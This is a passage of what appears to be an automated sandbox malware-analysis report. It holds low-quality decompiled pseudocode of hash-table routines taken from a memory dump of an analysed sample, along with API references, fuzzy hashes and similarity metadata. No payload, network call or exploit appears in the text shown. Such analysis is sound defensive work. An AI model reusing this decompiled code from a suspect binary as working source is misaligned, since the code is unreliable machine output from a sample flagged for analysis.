										__eflags =  *_t83;
										_t102 = 1;
										L48:
										 *_t196 = _t133;
										_t196[1] = _t102;
										return _t196;
									}
									_t74 = _t101 + 4; // 0x74ff8514
									_t104 =  *_t74;
									_t189 = _v24;
									_t141 = _t189 - 1;
									__eflags = _t189 & _t141;
									if((_t189 & _t141) != 0) {
										__eflags = _t104 - _t189;
										if(_t104 >= _t189) {
											_t80 = _t104 % _t189;
											__eflags = _t80;
											_t104 = _t80;
										}
									} else {
										_t104 = _t104 & _t141;
									}
									_t98 = (_t104 << 2) +  *_t162;
									__eflags = _t98;
									L46:
									 *_t98 = _t133;
									goto L47;
								}
								 *_t133 =  *_t98;
								_t196 = _a4;
								goto L46;
							}
							asm("movss xmm0, [eax+0xc]");
							asm("orpd xmm0, [0x110de0]");
							asm("subsd xmm0, [0x110dd0]");
							asm("cvtsd2ss xmm0, xmm0");
							asm("divss xmm0, [eax+0x10]");
							asm("cvtss2sd xmm0, xmm0");
							asm("movsd [esp], xmm0");
							_t110 = E001036A0(_t137);
							_v36 = _t210;
							asm("movss xmm0, [ebp-0x20]");
							asm("cvttss2si ecx, xmm0");
							asm("subss xmm0, [0x110dd8]");
							asm("cvttss2si eax, xmm0");
							_t112 = _t110 & _t137 >> 0x0000001f | _t137;
							__eflags = _t188 - 3;
							if(_t188 < 3) {
								L31:
								 *_t199 = _t112;
								_t112 = E0007A3AC(_t133, _t188);
								L32:
								__eflags = _t194 - _t112;
								_t194 =  <=  ? _t112 : _t194;
								__eflags = _t194 - _t188;
								if(_t194 >= _t188) {
									goto L34;
								}
								goto L33;
							}
							_t150 = (((_t188 - (_t188 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
							__eflags = _t150 - 1;
							if(_t150 > 1) {
								goto L31;
							}
							__eflags = _t112 - 2;
							if(_t112 >= 2) {
								asm("bsr ecx, eax");
								_t112 = 1 <<  ~(_t150 ^ 0x0000001f);
							}
							goto L32;
						}
					}
					asm("movd xmm3, edi");
					asm("por xmm3, xmm2");
					asm("subsd xmm3, xmm2");
					asm("xorps xmm2, xmm2");
					asm("cvtsd2ss xmm2, xmm3");
					asm("mulss xmm2, xmm1");
					asm("ucomiss xmm0, xmm2");
					if(__eflags <= 0) {
						goto L38;
					}
					goto L18;
				}
				_t135 = ((_t161 - (_t161 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t161 - (_t161 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t161 - (_t161 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t161 - (_t161 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f;
				_t192 = _t135 * 0x1010101 >> 0x18;
				if(_t192 > 1) {
					_t193 = _t132;
					__eflags = _t132 - _t161;
					if(_t132 >= _t161) {
						_t10 = _t132 % _v24;
						__eflags = _t10;
						_t193 = _t10;
					}
				} else {
					_t193 = _t161 - 0x00000001 & _t132;
				}
				_t134 =  *( *_v20 + _t193 * 4);
				if(_t134 == 0) {
					goto L16;
				}
				_v32 = _v24 - 1;
				while(1) {
					_t133 =  *_t134;
					if(_t133 == 0) {
						goto L16;
					}
					_t125 = _t133[1];
					if(_t125 == _v28) {
						L10:
						_t135 = _t133[2];
						 *_t199 =  *_a8;
						_t128 = E000D3090(_t133, _t135, _t192, _t193);
						_t199 = _t199 - 4;
						if(_t128 != 0) {
							_t102 = 0;
							_t196 = _a4;
							goto L48;
						}
						continue;
					}
					if(_t192 <= 1) {
						_t125 = _t125 & _v32;
						__eflags = _t125;
					} else {
						_t135 = _v24;
						if(_t125 >= _t135) {
							_t125 = _t125 % _t135;
						}
					}
					if(_t125 != _t193) {
						goto L16;
					} else {
						goto L10;
					}
				}
				goto L16;
			}

0x000dd1e0
0x000dd1e0
0x000dd1e9
0x000dd1f1
0x000dd1f4
0x000dd1f9
0x000dd1fc
0x000dd1ff
0x000dd243
0x000dd2b4
0x000dd2b7
0x000dd2c3
0x000dd2c7
0x000dd2cd
0x000dd2d0
0x000dd2d6
0x000dd2dd
0x000dd2e5
0x000dd2e9
0x000dd2ed
0x000dd2f1
0x000dd2f5
0x000dd2fa
0x000dd2fd
0x000dd2ff
0x000dd321
0x000dd321
0x000dd325
0x000dd329
0x000dd32e
0x000dd333
0x000dd336
0x000dd33b
0x000dd341
0x000dd34c
0x000dd352
0x000dd354
0x000dd357
0x000dd35c
0x000dd35f
0x000dd361
0x000dd366
0x000dd368
0x000dd368
0x000dd368
0x000dd368
0x000dd36b
0x000dd36d
0x000dd36f
0x000dd372
0x000dd377
0x000dd37a
0x000dd37d
0x000dd37f
0x000dd37f
0x000dd382
0x000dd384
0x000dd386
0x000dd389
0x000dd38e
0x000dd38e
0x000dd391
0x000dd391
0x000dd393
0x000dd393
0x000dd396
0x000dd398
0x000dd467
0x000dd467
0x000dd46d
0x00000000
0x000dd39e
0x000dd39e
0x000dd475
0x000dd475
0x000dd478
0x000dd478
0x000dd47b
0x000dd47b
0x000dd47e
0x000dd480
0x000dd483
0x000dd48a
0x000dd48d
0x000dd48f
0x000dd497
0x000dd497
0x000dd499
0x000dd499
0x000dd485
0x000dd485
0x000dd485
0x000dd49d
0x000dd49d
0x000dd49f
0x000dd4a2
0x000dd4a4
0x000dd4af
0x000dd4b2
0x000dd4b4
0x000dd4b7
0x000dd4ba
0x000dd4bd
0x000dd4bf
0x000dd4c1
0x000dd4c4
0x000dd4ec
0x000dd4ec
0x000dd4ec
0x000dd4ec
0x000dd4ef
0x000dd4f1
0x000dd4f1
0x000dd4f3
0x000dd4ff
0x000dd4ff
0x000dd4c6
0x000dd4c6
0x000dd4c9
0x000dd4cc
0x000dd4cf
0x000dd4d1
0x000dd4d7
0x000dd4d9
0x000dd4df
0x000dd4df
0x000dd4e1
0x000dd4e1
0x000dd4d3
0x000dd4d3
0x000dd4d3
0x000dd4e8
0x000dd4e8
0x000dd4ea
0x000dd4ea
0x00000000
0x000dd4ea
0x000dd4a8
0x000dd4aa
0x00000000
0x000dd4aa
0x000dd3a7
0x000dd3ac
0x000dd3b4
0x000dd3bc
0x000dd3c0
0x000dd3c5
0x000dd3c9
0x000dd3ce
0x000dd3d3
0x000dd3d6
0x000dd3db
0x000dd3e1
0x000dd3e9
0x000dd3f2
0x000dd3f4
0x000dd3f7
0x000dd456
0x000dd456
0x000dd459
0x000dd45e
0x000dd45e
0x000dd460
0x000dd463
0x000dd465
0x00000000
0x00000000
0x00000000
0x000dd465
0x000dd42d
0x000dd430
0x000dd433
0x00000000
0x00000000
0x000dd435
0x000dd438
0x000dd43b
0x000dd448
0x000dd448
0x00000000
0x000dd438
0x000dd398
0x000dd301
0x000dd305
0x000dd309
0x000dd30d
0x000dd310
0x000dd314
0x000dd318
0x000dd31b
0x00000000
0x00000000
0x00000000
0x000dd31b
0x000dd228
0x000dd234
0x000dd23a
0x000dd24a
0x000dd24c
0x000dd24e
0x000dd254
0x000dd254
0x000dd257
0x000dd257
0x000dd23c
0x000dd23f
0x000dd23f
0x000dd25e
0x000dd263
0x00000000
0x00000000
0x000dd269
0x000dd292
0x000dd292
0x000dd296
0x00000000
0x00000000
0x000dd298
0x000dd29e
0x000dd277
0x000dd27c
0x000dd27f
0x000dd282
0x000dd287
0x000dd28c
0x000dd44c
0x000dd44e
0x00000000
0x000dd44e
0x00000000
0x000dd28c
0x000dd2a3
0x000dd270
0x000dd270
0x000dd2a5
0x000dd2a5
0x000dd2aa
0x000dd2b0
0x000dd2b0
0x000dd2aa
0x000dd275
0x00000000
0x00000000
0x00000000
0x00000000
0x000dd275
0x00000000

APIs

__floor_pentium4.LIBCMT ref: 000DD32E
__floor_pentium4.LIBCMT ref: 000DD3CE

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: ee2c1ec22f27f8b04a481d02e4a04f1b09e33b66a7026d23efc3f3e2ed101cc2
Instruction ID: bb19ae8f61729086ad3562e92f182d4ded7d61b20f2c078a632d912663f1f498
Opcode Fuzzy Hash: ee2c1ec22f27f8b04a481d02e4a04f1b09e33b66a7026d23efc3f3e2ed101cc2
Instruction Fuzzy Hash: CCA1C172B147158BCB19CF69C88126DF3B2AF99310B19C62BE856EB341D730ED81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0009F250 Relevance: 3.3, APIs: 2, Instructions: 266
COMMONCrypto

Download Yara Rule

C-Code - Quality: 22%

			E0009F250(signed int __ecx, intOrPtr __fp0, signed int** _a4, intOrPtr* _a8, signed int** _a16) {
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t102;
				signed int _t105;
				signed int* _t106;
				signed int _t108;
				signed int _t113;
				signed int _t115;
				unsigned int _t124;
				signed int _t128;
				signed int* _t132;
				signed int** _t133;
				signed int _t134;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t146;
				signed int _t149;
				signed int _t152;
				void* _t153;
				signed int _t154;
				signed int _t171;
				signed int _t181;
				unsigned int _t186;
				unsigned int _t187;
				unsigned int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int** _t193;
				signed int _t194;
				signed int* _t196;
				intOrPtr _t207;

				_t207 = __fp0;
				_t134 = __ecx;
				_v24 =  *_a8;
				_t186 =  *(__ecx + 4);
				_v20 = __ecx;
				if(_t186 == 0) {
					_t190 = 0xffffffff;
					L17:
					 *_t196 = 0x18;
					_t132 = L000DDBBC();
					_t132[2] =  *( *_a16);
					_t33 =  &(_t132[3]); // 0xc
					E0009A7D0(_t33);
					_t132[1] = _v24;
					 *_t132 = 0;
					_t136 = _v20;
					asm("movq xmm2, [0x110dd0]");
					asm("movd xmm0, eax");
					asm("por xmm0, xmm2");
					asm("subsd xmm0, xmm2");
					asm("cvtsd2ss xmm0, xmm0");
					asm("movss xmm1, [ecx+0x10]");
					__eflags = _t186;
					if(__eflags == 0) {
						L19:
						asm("divss xmm0, xmm1");
						asm("cvtss2sd xmm0, xmm0");
						asm("movsd [esp], xmm0");
						_t97 = E001036A0(_t136);
						_v40 = _t207;
						asm("movss xmm0, [ebp-0x24]");
						asm("cvttss2si eax, xmm0");
						asm("subss xmm0, [0x110dd8]");
						asm("cvttss2si ecx, xmm0");
						_t138 = _t136 & _t97 >> 0x0000001f | _t97;
						_t152 = _t186 + _t186;
						_t98 = 1;
						__eflags = _t186 - 3;
						if(_t186 >= 3) {
							_t194 = _t186 - 1;
							__eflags = _t186 & _t194;
							_t44 = (_t186 & _t194) != 0;
							__eflags = _t44;
							_t98 = 0 | _t44;
						}
						_t99 = _t98 | _t152;
						__eflags = _t99 - _t138;
						_t100 =  <=  ? _t138 : _t99;
						_t191 = 2;
						__eflags = _t100 - 1;
						_t139 = _v20;
						if(_t100 != 1) {
							_t46 = _t100 - 1; // -1
							_t171 = _t46;
							__eflags = _t100 & _t171;
							if((_t100 & _t171) != 0) {
								 *_t196 = _t100;
								_t100 = E0007A3AC(_t132, _t186);
								_t139 = _v20;
							}
							_t191 = _t100;
						}
						_t187 =  *(_t139 + 4);
						__eflags = _t191 - _t187;
						if(__eflags > 0) {
							L34:
							 *_t196 = _t191;
							L0009DCB0(_t139, _t207);
							_t139 = _v20;
							goto L35;
						} else {
							if(__eflags >= 0) {
								L35:
								_t186 =  *(_t139 + 4);
								_t192 = _t186 - 1;
								__eflags = _t186 & _t192;
								if((_t186 & _t192) != 0) {
									_t190 = _v24;
									__eflags = _t190 - _t186;
									if(_t190 >= _t186) {
										_t62 = _t190 % _t186;
										__eflags = _t62;
										_t190 = _t62;
										_t139 = _v20;
									}
								} else {
									_t190 = _t192 & _v24;
								}
								L39:
								_t153 =  *_t139;
								_t102 =  *(_t153 + _t190 * 4);
								__eflags = _t102;
								if(_t102 == 0) {
									 *_t132 =  *(_t139 + 8);
									_t70 = _t139 + 8; // 0x8
									 *(_t139 + 8) = _t132;
									 *(_t153 + _t190 * 4) = _t70;
									_t105 =  *_t132;
									__eflags = _t105;
									_t193 = _a4;
									if(_t105 == 0) {
										L48:
										_t84 = _t139 + 0xc;
										 *_t84 =  *(_t139 + 0xc) + 1;
										__eflags =  *_t84;
										_t106 = 1;
										L49:
										 *_t193 = _t132;
										_t193[1] = _t106;
										return _t193;
									}
									_t108 =  *(_t105 + 4);
									_t154 = _t186 - 1;
									__eflags = _t186 & _t154;
									if((_t186 & _t154) != 0) {
										__eflags = _t108 - _t186;
										if(_t108 >= _t186) {
											_t80 = _t108 % _t186;
											__eflags = _t80;
											_t108 = _t80;
											_t139 = _v20;
										}
									} else {
										_t108 = _t108 & _t154;
									}
									_t102 = (_t108 << 2) +  *_t139;
									__eflags = _t102;
									L47:
									 *_t102 = _t132;
									goto L48;
								}
								 *_t132 =  *_t102;
								_t193 = _a4;
								goto L47;
							}
							asm("movss xmm0, [ecx+0xc]");
							asm("orpd xmm0, [0x110de0]");
							asm("subsd xmm0, [0x110dd0]");
							asm("cvtsd2ss xmm0, xmm0");
							asm("divss xmm0, [ecx+0x10]");
							asm("cvtss2sd xmm0, xmm0");
							asm("movsd [esp], xmm0");
							_t113 = E001036A0(_t139);
							_v36 = _t207;
							asm("movss xmm0, [ebp-0x20]");
							asm("cvttss2si ecx, xmm0");
							asm("subss xmm0, [0x110dd8]");
							asm("cvttss2si eax, xmm0");
							_t115 = _t113 & _t139 >> 0x0000001f | _t139;
							__eflags = _t187 - 3;
							if(_t187 < 3) {
								L32:
								 *_t196 = _t115;
								_t115 = E0007A3AC(_t132, _t187);
								L33:
								_t139 = _v20;
								__eflags = _t191 - _t115;
								_t191 =  <=  ? _t115 : _t191;
								__eflags = _t191 - _t187;
								if(_t191 >= _t187) {
									goto L35;
								}
								goto L34;
							}
							_t146 = (((_t187 - (_t187 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
							__eflags = _t146 - 1;
							if(_t146 > 1) {
								goto L32;
							}
							__eflags = _t115 - 2;
							if(_t115 >= 2) {
								asm("bsr ecx, eax");
								_t115 = 1 <<  ~(_t146 ^ 0x0000001f);
							}
							goto L33;
						}
					}
					asm("movd xmm3, edi");
					asm("por xmm3, xmm2");
					asm("subsd xmm3, xmm2");
					asm("xorps xmm2, xmm2");
					asm("cvtsd2ss xmm2, xmm3");
					asm("mulss xmm2, xmm1");
					asm("ucomiss xmm0, xmm2");
					if(__eflags <= 0) {
						goto L39;
					}
					goto L19;
				}
				_t124 = _t186;
				_t189 = (((_t186 - (_t186 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t186 - (_t186 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t186 - (_t186 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t186 - (_t186 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
				_v28 = _t124;
				if(_t189 > 1) {
					_t181 = _v24;
					_t190 = _t181;
					__eflags = _t181 - _t124;
					if(_t181 >= _t124) {
						_t11 = _t181 % _v28;
						__eflags = _t11;
						_t190 = _t11;
						_t181 = _v24;
						_t134 = _v20;
					}
				} else {
					_t181 = _v24;
					_t190 = _t124 - 0x00000001 & _t181;
				}
				_t133 =  *( *_t134 + _t190 * 4);
				if(_t133 == 0) {
					L16:
					_t186 = _v28;
					goto L17;
				}
				_v32 = _v28 - 1;
				_t149 = _v28;
				while(1) {
					_t132 =  *_t133;
					if(_t132 == 0) {
						goto L16;
					}
					_t128 = _t132[1];
					if(_t128 == _t181) {
						L10:
						if(_t132[2] == _t181) {
							_t106 = 0;
							_t193 = _a4;
							goto L49;
						}
						continue;
					}
					if(_t189 <= 1) {
						_t128 = _t128 & _v32;
						__eflags = _t128;
					} else {
						if(_t128 >= _t149) {
							_t128 = _t128 % _t149;
							_t181 = _v24;
						}
					}
					if(_t128 != _t190) {
						goto L16;
					} else {
						goto L10;
					}
				}
				goto L16;
			}

0x0009f250
0x0009f250
0x0009f25e
0x0009f261
0x0009f266
0x0009f269
0x0009f2b5
0x0009f324
0x0009f324
0x0009f330
0x0009f339
0x0009f33c
0x0009f33f
0x0009f347
0x0009f34a
0x0009f350
0x0009f357
0x0009f35f
0x0009f363
0x0009f367
0x0009f36b
0x0009f36f
0x0009f374
0x0009f376
0x0009f398
0x0009f398
0x0009f39c
0x0009f3a0
0x0009f3a5
0x0009f3aa
0x0009f3ad
0x0009f3b2
0x0009f3b8
0x0009f3c3
0x0009f3c9
0x0009f3cb
0x0009f3ce
0x0009f3d3
0x0009f3d6
0x0009f3d8
0x0009f3dd
0x0009f3df
0x0009f3df
0x0009f3df
0x0009f3df
0x0009f3e2
0x0009f3e4
0x0009f3e6
0x0009f3e9
0x0009f3ee
0x0009f3f1
0x0009f3f4
0x0009f3f6
0x0009f3f6
0x0009f3f9
0x0009f3fb
0x0009f3fd
0x0009f400
0x0009f405
0x0009f405
0x0009f408
0x0009f408
0x0009f40a
0x0009f40d
0x0009f40f
0x0009f4de
0x0009f4de
0x0009f4e1
0x0009f4e9
0x00000000
0x0009f415
0x0009f415
0x0009f4ec
0x0009f4ec
0x0009f4ef
0x0009f4f2
0x0009f4f4
0x0009f4fb
0x0009f4fe
0x0009f500
0x0009f506
0x0009f506
0x0009f508
0x0009f50a
0x0009f50a
0x0009f4f6
0x0009f4f6
0x0009f4f6
0x0009f50d
0x0009f50d
0x0009f50f
0x0009f512
0x0009f514
0x0009f522
0x0009f524
0x0009f527
0x0009f52a
0x0009f52d
0x0009f52f
0x0009f531
0x0009f534
0x0009f558
0x0009f558
0x0009f558
0x0009f558
0x0009f55b
0x0009f55d
0x0009f55d
0x0009f55f
0x0009f56b
0x0009f56b
0x0009f536
0x0009f539
0x0009f53c
0x0009f53e
0x0009f544
0x0009f546
0x0009f54a
0x0009f54a
0x0009f54c
0x0009f54e
0x0009f54e
0x0009f540
0x0009f540
0x0009f540
0x0009f554
0x0009f554
0x0009f556
0x0009f556
0x00000000
0x0009f556
0x0009f518
0x0009f51a
0x00000000
0x0009f51a
0x0009f41b
0x0009f420
0x0009f428
0x0009f430
0x0009f434
0x0009f439
0x0009f43d
0x0009f442
0x0009f447
0x0009f44a
0x0009f44f
0x0009f455
0x0009f45d
0x0009f466
0x0009f468
0x0009f46b
0x0009f4ca
0x0009f4ca
0x0009f4cd
0x0009f4d2
0x0009f4d2
0x0009f4d5
0x0009f4d7
0x0009f4da
0x0009f4dc
0x00000000
0x00000000
0x00000000
0x0009f4dc
0x0009f4a1
0x0009f4a4
0x0009f4a7
0x00000000
0x00000000
0x0009f4a9
0x0009f4ac
0x0009f4af
0x0009f4bc
0x0009f4bc
0x00000000
0x0009f4ac
0x0009f40f
0x0009f378
0x0009f37c
0x0009f380
0x0009f384
0x0009f387
0x0009f38b
0x0009f38f
0x0009f392
0x00000000
0x00000000
0x00000000
0x0009f392
0x0009f298
0x0009f2a0
0x0009f2a6
0x0009f2a9
0x0009f2bc
0x0009f2bf
0x0009f2c1
0x0009f2c3
0x0009f2c9
0x0009f2c9
0x0009f2cc
0x0009f2ce
0x0009f2d1
0x0009f2d1
0x0009f2ab
0x0009f2ae
0x0009f2b1
0x0009f2b1
0x0009f2d6
0x0009f2db
0x0009f321
0x0009f321
0x00000000
0x0009f321
0x0009f2e1
0x0009f2e4
0x0009f300
0x0009f300
0x0009f304
0x00000000
0x00000000
0x0009f306
0x0009f30b
0x0009f2f7
0x0009f2fa
0x0009f4c0
0x0009f4c2
0x00000000
0x0009f4c2
0x00000000
0x0009f2fa
0x0009f310
0x0009f2f0
0x0009f2f0
0x0009f312
0x0009f314
0x0009f31a
0x0009f31c
0x0009f31c
0x0009f314
0x0009f2f5
0x00000000
0x00000000
0x00000000
0x00000000
0x0009f2f5
0x00000000

APIs

__floor_pentium4.LIBCMT ref: 0009F3A5
__floor_pentium4.LIBCMT ref: 0009F442

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 95e7dc7aa2f4e658799d4989344d1bc98448a4115fd2bab449d683f04bf0eb0b
Instruction ID: a0a442f1352f763e62afa52a9ec3b7b371f4279348b89a3558c124726ff2d8f8
Opcode Fuzzy Hash: 95e7dc7aa2f4e658799d4989344d1bc98448a4115fd2bab449d683f04bf0eb0b
Instruction Fuzzy Hash: 18A1C532B106168FCF15CF69C8812AEB3B2AFD5310729C669D919EB345D731ED819B41

Uniqueness

Uniqueness Score: -1.00%

Function 000CE37C Relevance: 2.1, APIs: 1, Instructions: 557COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 000CE49F

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 246b2eca32af14f8957588f8ab6208d5a721cdcdc0a5811bf48bb5ae656de0ac
Instruction ID: 29db7fdc1b558f1580495bbfce775097cf6266c4e34ad36f8cc82ef0a5d61390
Opcode Fuzzy Hash: 246b2eca32af14f8957588f8ab6208d5a721cdcdc0a5811bf48bb5ae656de0ac
Instruction Fuzzy Hash: 4012BF726053859FD725EF54C881FEFB7E9AF89310F04091DF98997242DB30AA05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0007A3AC Relevance: 1.9, Strings: 1, Instructions: 613COMMON

Download Yara Rule

Strings

__next_prime overflow, xrefs: 0007AB25

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID:
String ID: __next_prime overflow
API String ID: 0-822664188
Opcode ID: ed7700f128275ac97bc8832e5edda728ec23df2cbde50eb3a1e791599a6cd47d
Instruction ID: 2956b4bfee61a6d69b499e3aa1398cc22f034bc71070f8fd6cb6f89967ece404
Opcode Fuzzy Hash: ed7700f128275ac97bc8832e5edda728ec23df2cbde50eb3a1e791599a6cd47d
Instruction Fuzzy Hash: DD02A132F042218FCB5DCD29CCD91AEB393ABD5340B18C57ADC0ED7211D329AD5AC66A

Uniqueness

Uniqueness Score: -1.00%

Function 000FF347 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,0009CEA8), ref: 000FF574

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f953de63d64f689cb62adb9ac90c838991dd8e3ae0fc611cabca90e52ba504b7
Instruction ID: 9f062ddc70aeb27e05dce1a39bfc58a6a6016bc4c06f15ae9f7b7d62d692729a
Opcode Fuzzy Hash: f953de63d64f689cb62adb9ac90c838991dd8e3ae0fc611cabca90e52ba504b7
Instruction Fuzzy Hash: 09B16F3121060ACFD764CF28C486B797BE0FF45364F258668EA99CF6A1C735E981DB40

Uniqueness

Uniqueness Score: -1.00%

Function 000DE406 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000DE41C

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: ebef27f8d85161b5188454e5a27c1117b83f1d36643a8a4e980d4894457a39e0
